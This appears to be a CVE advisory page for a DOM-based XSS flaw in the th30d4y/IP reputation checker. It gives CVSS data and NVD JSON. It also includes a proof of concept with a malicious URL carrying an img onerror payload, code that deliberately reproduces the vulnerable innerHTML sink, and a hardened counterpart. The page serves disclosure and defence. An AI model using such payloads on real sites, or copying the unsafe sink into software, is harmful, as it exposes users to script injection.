Security Vulnerability Report
CVE-2026-41575 CVSS 6.1 MEDIUM

Published: 2026-05-08 15:16:41
Last Modified: 2026-05-08 16:08:16

Description

In th30d4y/IP from version 1.0.1 to before version 2.0.1, a DOM-Based Cross-Site Scripting (XSS) vulnerability was identified in an IP Reputation Checker application. Unsanitized user input was directly rendered in the browser, allowing attackers to execute arbitrary JavaScript. This issue has been patched in version 2.0.1.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

th30d4y/IP >= 1.0.1, < 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Proof of Concept for CVE-2026-41575 -->
<!-- The application takes an IP address from the URL and renders it via innerHTML -->
<!-- Malicious URL Example -->
<!-- https://target-site/checker?ip=<img src=x onerror=alert('XSS')> -->
<!-- Output element the script writes into -->
<div id="ip-display"></div>
<script>
  // Simulating the vulnerable behavior in th30d4y/IP
  function checkIP() {
    // Get user input from URL parameter
    const urlParams = new URLSearchParams(window.location.search);
    let ip = urlParams.get('ip');
    if (ip) {
      // VULNERABLE CODE: Unsanitized input directly inserted into DOM
      document.getElementById('ip-display').innerHTML = "Scanning IP: " + ip;
    } else {
      document.getElementById('ip-display').innerText = "No IP provided";
    }
  }
  // Execute the function to demonstrate the vulnerability
  checkIP();
</script>
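A hardened counterpart to the snippet above, added here as an example; it is not code from th30d4y/IP or from its 2.0.1 patch, which this page does not show. It validates the `ip` parameter as an IP literal and writes only through `textContent`; the function names and status messages are assumptions.

```javascript
// Added example, not th30d4y/IP code. The 'ip' parameter and 'ip-display' id
// come from the PoC on this page; parseIp and renderIp are hypothetical names.

// Dotted-quad IPv4, each octet 0-255, no leading zeros.
const OCTET = '(?:25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)';
const IPV4 = new RegExp('^' + OCTET + '(?:\\.' + OCTET + '){3}$');

// IPv6: restrict the alphabet first, then let the WHATWG URL host parser
// (available in browsers and Node) decide whether the literal is well formed.
function isIPv6(s) {
  if (!s.includes(':') || !/^[0-9a-fA-F:.]{2,45}$/.test(s)) return false;
  try {
    new URL('http://[' + s + ']/');
    return true;
  } catch (e) {
    return false;
  }
}

// Returns the address if it is a syntactically valid IP literal, else null.
function parseIp(raw) {
  if (typeof raw !== 'string') return null;
  const ip = raw.trim();
  return IPV4.test(ip) || isIPv6(ip) ? ip : null;
}

// Writes a status line into `el` using textContent only, so nothing taken
// from the URL is ever parsed as markup. Returns true when a scan may start.
function renderIp(el, search) {
  const raw = new URLSearchParams(search).get('ip');
  if (raw === null) {
    el.textContent = 'No IP provided';
    return false;
  }
  const ip = parseIp(raw);
  el.textContent = ip === null ? 'Invalid IP address' : 'Scanning IP: ' + ip;
  return ip !== null;
}

// Browser wiring; skipped when run outside a page (for example under Node).
if (typeof document !== 'undefined') {
  renderIp(document.getElementById('ip-display'), window.location.search);
}
```

The `textContent` sink alone closes the script-injection path; the validation step additionally keeps non-address input away from whatever lookup the checker performs next.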

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41575", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:40.740", "lastModified": "2026-05-08T16:08:15.570", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In th30d4y/IP from version 1.0.1 to before version 2.0.1, a DOM-Based Cross-Site Scripting (XSS) vulnerability was identified in an IP Reputation Checker application. Unsanitized user input was directly rendered in the browser, allowing attackers to execute arbitrary JavaScript. This issue has been patched in version 2.0.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://github.com/th30d4y/IP/security/advisories/GHSA-j7wv-7j97-9qh9", "source": "[email protected]"}]}}